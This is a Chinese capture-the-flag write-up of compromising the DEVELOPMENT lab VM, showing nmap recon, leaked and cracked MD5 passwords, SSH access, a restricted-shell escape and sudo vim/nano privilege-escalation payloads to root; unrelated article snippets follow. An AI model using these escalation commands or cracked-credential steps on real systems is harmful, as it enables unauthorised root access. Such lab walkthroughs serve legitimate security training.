红队打靶练习:DIGITALWORLD.LOCAL: DEVELOPMENT

news2024/11/24 15:02:11

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.141  00:50:56:2f:2e:b2       VMware, Inc.
192.168.12.254  00:50:56:f2:fe:52       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.353 seconds (108.80 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 63 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 3780
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08     48    2880  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      9     540  VMware, Inc.
 192.168.12.141  00:50:56:2f:2e:b2      5     300  VMware, Inc.
 192.168.12.254  00:50:56:f2:fe:52      1      60  VMware, Inc.


3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 14:59 CST
Nmap scan report for 192.168.12.1
Host is up (0.00027s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000051s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.141
Host is up (0.00012s latency).
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000053s latency).
MAC Address: 00:50:56:F2:FE:52 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.38 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.141 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:02 CST
Nmap scan report for 192.168.12.141
Host is up (0.0026s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
113/tcp  open  ident
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk -F "/" '{print $1}' | head -n 10 | tail -n 5 | xargs -n 6 | sed 's/ /,/g'
22,113,139,445,8080


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:03 CST
Nmap scan report for 192.168.12.141
Host is up (0.00043s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Allow: HEAD,GET,POST,OPTIONS
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Content-Length: 293
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.12.141 Port 8080</address>
|_    </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-server-header: IIS 6.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=12/21%Time=6583E358%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2021\x20Dec\
SF:x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\
SF:x20Wed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de3
SF:2091ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary
SF::\x20Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/h
SF:tml\r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR
SF:\x20OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welc
SF:ome\x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20a
SF:re\x20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20
SF:these\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20
SF:We\x20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection
SF:\x20system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@go
SF:odtech\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\
SF:x20by\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20
SF:development\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20
SF:-->\r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</ht
SF:ml>\r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x20
SF:21\x20Dec\x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow
SF::\x20HEAD,GET,POST,OPTIONS\r\nContent-Length:\x200\r\nConnection:\x20cl
SF:ose\r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CC,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x2021\x20Dec\x202023\x2007:
SF:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20293\r\nCon
SF:nection:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\
SF:r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//E
SF:N\">\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>
SF:\n<h1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x
SF:20that\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>
SF:\n<hr>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.12\.141\x20Po
SF:rt\x208080</address>\n</body></html>\n");
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENT\x00
|   Domain name: \x00
|   FQDN: development
|_  System time: 2023-12-21T07:05:23+00:00
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2023-12-21T07:05:23
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -4s, deviation: 3s, median: -6s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.12.141

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.48 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:09 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.141
Host is up (0.00017s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
113/tcp  open   ident
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
8080/tcp open   http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 197.55 seconds


4、端口总结

22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)  后续可以用的上。

113/tcp  open  ident?     端口113/tcp是一个开放的ident端口。Ident(Identification Protocol)是一种用于验证连接的客户端的身份的协议。它通常用于识别和验证通过Internet连接到服务器的用户。

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)   端口139/tcp是一个开放的netbios-ssn端口,同时运行着Samba的smbd服务版本3.x到4.x,所属工作组为WORKGROUP。

445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)  端口445/tcp是一个开放的netbios-ssn端口,同时运行着Samba的smbd服务版本4.7.6,所属工作组仍然是WORKGROUP

8080/tcp open  http-proxy  IIS 6.0  IIS 是微软的Web服务器软件,用于托管网站和应用程序。端口8080通常是用作代理服务器,用于转发客户端发起的HTTP请求。


WEB

8080端口


翻译

欢迎访问开发页面。
这个盒子里有很多项目。在html_pages上查看其中一些项目。
警告!我们正在试验一种基于主机的入侵检测系统。向报告所有误报patrick@goodtech.com.sg.


8080端口主页源码


<!-- Searching for development secret page... where could it be? -->

<!-- Patrick, Head of Development-->

根据提示 development  这个单词出现的频率很高。
也提示我们去 html_pages 页面寻找信息。

靶机提示说不建议使用暴力破解,我进行目录探测的时候,可能是因为线程太高,靶机直接不让我扫描了!而且靶机介绍信息也说了该主页不太稳定。

/development页面


要我们下载一个名为   test.pcap的流量包! 

这个流量包其实就是个捷径!我这里没有列出,在流量包中设置过滤器为http,回显为200的流量包中可以找到一个路径!(/developmentsecretpage/sitemap.php)

/html_pages 页面


/development.html页面


访问 ./developmentsecretpage 


sitemap.php


来到 /developmentsecretpage/sitemap.php页面,点击注销。

漏洞探测



文件泄露


直接使用谷歌搜索,就会出现该漏洞的payload

这个页面存在信息泄露以及文件包含漏洞!

我得到了账号密码:

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98

MD5爆破

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb      
intern, 4a8a2b374f463b7aedbb44a066363b81   (12345678900987654321) 
patrick, 87e6d56ce79af90dbe07d387d3d0579e  (P@ssw0rd25)
qiu, ee64497098d0926d198f54f6d5431f98      (qiu)


ssh登录
┌──(root㉿ru)-[~/kali]
└─# ssh intern@192.168.12.141
intern@192.168.12.141's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 21 09:01:17 UTC 2023

  System load:  0.05               Processes:            171
  Usage of /:   31.5% of 19.51GB   Users logged in:      0
  Memory usage: 31%                IP address for ens33: 192.168.12.141
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

186 packages can be updated.
56 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Thu Dec 21 08:59:21 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ls
access  local.txt  work.txt
intern:~$

提权

系统信息收集
Last login: Thu Dec 21 09:03:54 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
intern:~$

好家伙,只能使用这些命令。用别的话会退出。

intern:~$ id
Traceback (most recent call last):
  File "/usr/local/bin/lshell", line 27, in <module>
    lshell.main()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 1165, in main
    cli.cmdloop()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 385, in cmdloop
    stop = self.onecmd(line)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 503, in onecmd
    func = getattr(self, 'do_' + cmd)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 134, in __getattr__
    if self.check_path(self.g_line) == 1:
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 303, in check_path
    item = re.sub('^~', self.conf['home_path'], item)
  File "/usr/lib/python2.7/re.py", line 155, in sub
    return _compile(pattern, flags).sub(repl, string, count)
TypeError: expected string or buffer
Connection to 192.168.12.141 closed.


┌──(root㉿ru)-[~/kali]
└─#


intern@development:~$ ls
access  local.txt  work.txt
intern@development:~$ cat local.txt
Congratulations on obtaining a user shell. :)
intern@development:~$ cat work.txt
1.      Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.

2.      Patrick's start of the third year in this company!

3.      Attend the meeting to discuss if password policy should be relooked at.
intern@development:~$

祝贺您获得用户权限。:)

1.告诉帕特里克,喊话不管用。我们需要恢复到旧的方法来更新David关于shoutbox的信息。对于新的,我们将使用旧导演的登录页。
2.帕特里克在这家公司的第三年开始了!
3.参加会议讨论是否应重新查看密码策略。


intern@development:~$ cat /etc/passwd | grep "/home" | grep -v "nologin"
admin:x:1000:1004:DEVELOPMENT:/home/admin:/bin/bash
patrick:x:1001:1005:,,,:/home/patrick:/bin/bash
intern:x:1002:1006::/home/intern:/usr/local/bin/lshell

intern@development:/home$ cd intern/
intern@development:~$ ls -al
total 36
drwxr-xr-x 6 intern intern 4096 Dec 21 09:07 .
drwxr-xr-x 5 root   root   4096 Jun 14  2018 ..
drwxrwxrwx 9 intern intern 4096 Jul 16  2018 access
drwx------ 2 intern intern 4096 Jul 16  2018 .cache
drwx------ 3 intern intern 4096 Jul 16  2018 .gnupg
-rw------- 1 intern intern   56 Dec 21 09:07 .lhistory
drwxrwxr-x 3 intern intern 4096 Jul 15  2018 .local
-rw-r--r-- 1 intern intern   46 Dec 26  2018 local.txt
-rw-r--r-- 1 intern intern  299 Dec 26  2018 work.txt
intern@development:~$ cd access/
intern@development:~/access$ ls
IA64  tcpdump.txt  W32ALPHA  W32MIPS  W32PPC  W32X86  WIN40  x64
intern@development:~/access$ cat tcpdump.txt
1. request for rights to perform tcpdump on traffic. we want to monitor network traffic.
2. tcpdump is a useful tool; we should learn how to pipe tcpdump traffic for building up our Security Operations Centre.
intern@development:~/access$

1.请求对流量执行tcpdump的权限。我们想要监控网络流量。
2.tcpdump是一个有用的工具;我们应该学习如何通过管道传输tcpdump流量来建立我们的安全操作中心。


intern@development:/home/patrick$ ls -al
total 40
drwxr-xr-x 4 patrick patrick 4096 Sep 29  2018 .
drwxr-xr-x 5 root    root    4096 Jun 14  2018 ..
-rw-r--r-- 1 patrick patrick  168 Jul 23  2018 access.txt
-rw-r--r-- 1 patrick patrick  220 Jun 12  2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3771 Jun 12  2018 .bashrc
drwx------ 2 patrick patrick 4096 Jun 12  2018 .cache
drwx------ 3 patrick patrick 4096 Jun 12  2018 .gnupg
-rw-r--r-- 1 patrick patrick  425 Jul 23  2018 password.txt
-rw-r--r-- 1 patrick patrick  807 Jun 12  2018 .profile
-rw-r--r-- 1 patrick patrick    0 Jun 12  2018 .sudo_as_admin_successful
-rw------- 1 patrick patrick 1077 Aug 27  2018 .viminfo
intern@development:/home/patrick$ cat access.txt
/-\/-\----/-\/-\
\-/\-/\--/\-/\-/

  ACCESS PANEL

/-\/-\/--\/-\/-\
\-/\-/----\-/\-/

LOGIN: _________
PASSWORD: ______

SORRY.
ACCESS DENIED.

YOU MUST...
TRY HARDER.
intern@development:/home/patrick$ cat password.txt
(----------------------)
 (--------------------)
  (------------------)
   (----------------)
    (--------------)

     WELCOME TO THE
        PASSWORD
         PORTAL

        INTRUDER
         ALERT!

    (---------------)
   (-----------------)
  (-------------------)
 (---------------------)
(-----------------------)

 TO ROOT ME, YOU NEED TO

(-----------------------)

      TRY HARDER!!!

(-----------------------)

密码就是之前我们找到的  patrick, 87e6d56ce79af90dbe07d387d3d0579e  (P@ssw0rd25)

本地提权
intern@development:/home/patrick$ su patrick
Password:
patrick@development:~$ id
uid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)
patrick@development:~$

patrick@development:~$ sudo -l
Matching Defaults entries for patrick on development:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User patrick may run the following commands on development:
    (ALL) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /bin/nano
patrick@development:~$

vim提权


patrick@development:~$ sudo vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) groups=0(root)
#


payload

1、sudo vim -c ':!/bin/sh'

2、sudo vim  --> :!/bin/bash

nano提权

Command to execute: reset; sh 1>&0 2>&0#
#  Get Help                        ^X Read File
#  Cancel                          M-F New Buffer
#
#
# id
uid=0(root) gid=0(root) groups=0(root)


payload

sudo nano
^R^X   = ctrl + r 、ctrl + x
reset; sh 1>&0 2>&0


get root and flag
# id
uid=0(root) gid=0(root) groups=0(root)

# whereis python
python: /usr/bin/python /usr/bin/python2.7 /usr/bin/python3.6 /usr/bin/python3.6m /usr/lib/python3.7 /usr/lib/python2.7 /usr/lib/python3.6 /etc/python /etc/python2.7 /etc/python3.6 /usr/local/lib/python2.7 /usr/local/lib/python3.6 /usr/share/python /usr/share/man/man1/python.1.gz

# python2 -c 'import pty;pty.spawn("/bin/bash")'

root@development:/root# ls -al
total 72
drwx------  5 root  root    4096 Dec 26  2018 .
drwxr-xr-x 23 root  root    4096 Dec 21 08:27 ..
-rw-------  1 root  root    1622 Dec 26  2018 .bash_history
-rw-r--r--  1 root  root    3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root  root     644 Jun 14  2018 iptables-rules
drwxr-xr-x  3 root  root    4096 Jun 12  2018 .local
drwxr-xr-x  7 admin lpadmin 4096 Aug 23  2018 lshell-0.9.9
-rw-r--r--  1 root  root     148 Aug 17  2015 .profile
----------  1 root  root      43 Dec 26  2018 proof.txt
-rw-------  1 root  root    1024 Aug  1  2018 .rnd
-rw-r--r--  1 root  root      66 Sep 26  2018 .selected_editor
-rw-r--r--  1 root  root    9542 Jul 15  2018 smb.conf
drwx------  2 root  root    4096 Jun 10  2018 .ssh
-rwx------  1 root  root     229 Sep 26  2018 tcpdumpclock.sh
-rw-------  1 root  root     582 Aug 27  2018 .viminfo
-rw-r--r--  1 root  root     209 Aug  1  2018 .wget-hsts

root@development:/root# cat proof.txt
Congratulations on rooting DEVELOPMENT! :)

root@development:/root#


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1327524.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Docker 学习总结(80)—— 轻松驾驭容器,玩转 LazyDocker

前言 LazyDocker 是一个用户友好的命令行工具,简化了 Docker 的管理。它能够通过单一命令执行常见的 Docker 任务,如启动、停止、重启和移除容器。LazyDocker 还能轻松查看日志、清理未使用的容器和镜像,并自定义指标。 简绍 LazyDocker 是一个用户友好的 CLI 工具,可以轻…

逻辑回归(LR,Logistic Regression)算法 简介

逻辑回归&#xff08;LR&#xff0c;Logistic Regression&#xff09;算法 当线性回归的预测结果&#xff0c;由于受到个别极端数值的影响而不准的时候, 可以用逻辑回归来解决. 逻辑回归模型的输出只能在 0 到 1 之间&#xff0c;也就是表达一个事件会发生的概率&#xff0c;…

Java---泛型讲解

文章目录 1. 泛型类2. 泛型方法3. 泛型接口4. 类型通配符5. 可变参数6. 可变参数的使用 1. 泛型类 1. 格式&#xff1a;修饰符 class 类名 <类型>{ }。例如&#xff1a;public class Generic <T>{ }。 2. 代码块举例&#xff1a; public class Generic <T>{…

【UML】第10篇 类图(属性、操作和接口)(2/3)

目录 3.3 类的属性&#xff08;Attribute&#xff09; 3.3.1 可见性&#xff08;Visibility&#xff09; 3.3.2 属性的名称 3.3.3 数据类型 3.3.4 初始值 3.3.5 属性字符串 3.4 类的操作&#xff08;Operations&#xff09; 3.4.1 参数表 3.4.2 返回类型 3.5 类的职责…

java并发编程六 共享模型之内存

文章目录 Java 内存模型可见性解决方法 有序性解决方法 Java 内存模型 JMM 即 Java Memory Model&#xff0c;它定义了主存、工作内存抽象概念&#xff0c;底层对应着 CPU 寄存器、缓存、硬件内存、CPU 指令优化等。 JMM 体现在以下几个方面 原子性 - 保证指令不会受到线程上…

算法与数据结构--哈夫曼树与哈夫曼编码

演示视频&#xff1a; 【1】数据结构——五分钟搞定哈夫曼树&#xff0c;会求WPL值&#xff0c;不会你打我_哔哩哔哩_bilibili 【2】哈夫曼树和哈夫曼编码_哔哩哔哩_bilibili 【3】哈夫曼树的构造的做题三步骤_哔哩哔哩_bilibili 求哈夫曼编码的步骤&#xff1a; 1.根据字符及…

Linux(二)常用命令

文章目录 一、文件管理命令1.1 chmod1.2 chown1.3 cat1.4 cp1.5 find1.6 head1.7 tail1.8 less1.9 more1.10 mv1.11 rm1.12 touch1.13 vim1.14 >和>>1.15 scp1.16 ln1.17 怎么用命令查看日志 二、文档管理命令2.1 grep2.2 wc2.3 echo 三、磁盘管理命令3.1 cd3.2 df3.3…

lamda表达式(史上最全)

一、函数式接口 在jdk8中什么是函数式接口&#xff1a; 被FunctionalInterface注解修饰的。接口里边只有一个非default的方法。 满足以上2个条件的即为函数式接口&#xff0c;ps&#xff1a;即使一个接口没有FunctionalInterface修饰&#xff0c;但是满足2&#xff0c;那么这…

​TrustZone之可信固件

Trusted Firmware是Armv8-A设备的安全世界软件的开源参考实现。Trusted Firmware为SoC开发人员和OEM提供了一个符合相关Arm规格&#xff08;包括TBBR和SMCC&#xff09;的参考Trusted代码库。 以下图表显示了Trusted Firmware的结构&#xff1a; SMC调度程序处理传入的SMC。SMC…

LIGA-Stereo:为基于立体 3D 检测器的学习 LiDAR 几何感知表示

论文地址&#xff1a;https://openaccess.thecvf.com/content/ICCV2021/papers/Guo_LIGA-Stereo_Learning_LiDAR_Geometry_Aware_Representations_for_Stereo-Based_3D_Detector_ICCV_2021_paper.pdf 论文代码&#xff1a;https://github.com/xy-guo/LIGA-Stereo 摘要 基于立…

解决Maven找不到依赖的问题

如果经过Reload Maven项目&#xff0c;清除Idea缓存&#xff0c;甚至重启Idea等方法都解决不了Dependency xxx not found的问题&#xff0c;不妨试试手动安装。 1. 进入maven仓库&#xff0c;搜索自己需要的对应版本的依赖。 2. 点击下图红框jar图标下载对应的jar包&#xff0c…

CGAL的3D Alpha Shapes

假设我们给定一个二维或三维的点集S&#xff0c;我们希望得到类似“这些点形成的形状”的东西。这是一个相当模糊的概念&#xff0c;可能有许多可能的解释&#xff0c;阿尔法形状就是其中之一。阿尔法形状可用于从密集的无组织数据点集进行形状重建。事实上&#xff0c;阿尔法形…

基于比较的排序算法总结(java实现版)

目录 什么是基于比较的排序算法 什么是排序算法的稳定性 基础排序算法的稳定性 插入排序法 希尔排序法 冒泡排序法 总结 高级算法的稳定性 快速排序法 堆排序法 归并排序法 总结 注意 什么是基于比较的排序算法 基于比较的排序算法定义&#xff1a;之所以能给元素…

【银行测试】银行金融测试+金融项目测试点汇总...

目录&#xff1a;导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结&#xff08;尾部小惊喜&#xff09; 前言 1、银行金融测试是…

案例101:基于微信小程序的停车共享小程序

文末获取源码 开发语言&#xff1a;Java 框架&#xff1a;SSM JDK版本&#xff1a;JDK1.8 数据库&#xff1a;mysql 5.7 开发软件&#xff1a;eclipse/myeclipse/idea Maven包&#xff1a;Maven3.5.4 小程序框架&#xff1a;uniapp 小程序开发软件&#xff1a;HBuilder X 小程序…

微信小程序 动态设置状态栏样式

onLoad(options) {//修改状态栏标题wx.setNavigationBarTitle({title: 页面标题, //页面标题success: () > {}, //接口调用成功的回调函数fail: () > {}, //接口调用失败的回调函数complete: () > {} //接口调用结束的回调函数&#xff08;调用成功、失败…

CentOS 7 Tomcat服务的安装

前提 安装ava https://blog.csdn.net/qq_36940806/article/details/134945175?spm1001.2014.3001.5501 1. 下载 wget https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.84/bin/apache-tomcat-9.0.84.tar.gzps: 可选择自己需要的版本下载安装https://mirr…

Centos7在安装Graylog时新安装MongoDB报错端口不监听服务不启动无法运行启动失败

由于虚拟机服务器上需要安装Graylog需要安装MongoDB&#xff0c;尝试官网下载安装包&#xff0c;和yum安装均无法正常启动&#xff0c;折腾了好几天&#xff0c;重装了十几次&#xff0c;网上搜索了很多很多资料&#xff0c;均无法正常运行&#xff0c;百度上搜索各种文档&…

python三大开发框架django、 flask 和 fastapi 对比

本文讲述了什么启发了 FastAPI 的诞生&#xff0c;它与其他替代框架的对比&#xff0c;以及从中汲取的经验。 如果不是基于前人的成果&#xff0c;FastAPI 将不会存在。在 FastAPI 之前&#xff0c;前人已经创建了许多工具 。 几年来&#xff0c;我一直在避免创建新框架。首先&…

【python笔记】并发编程

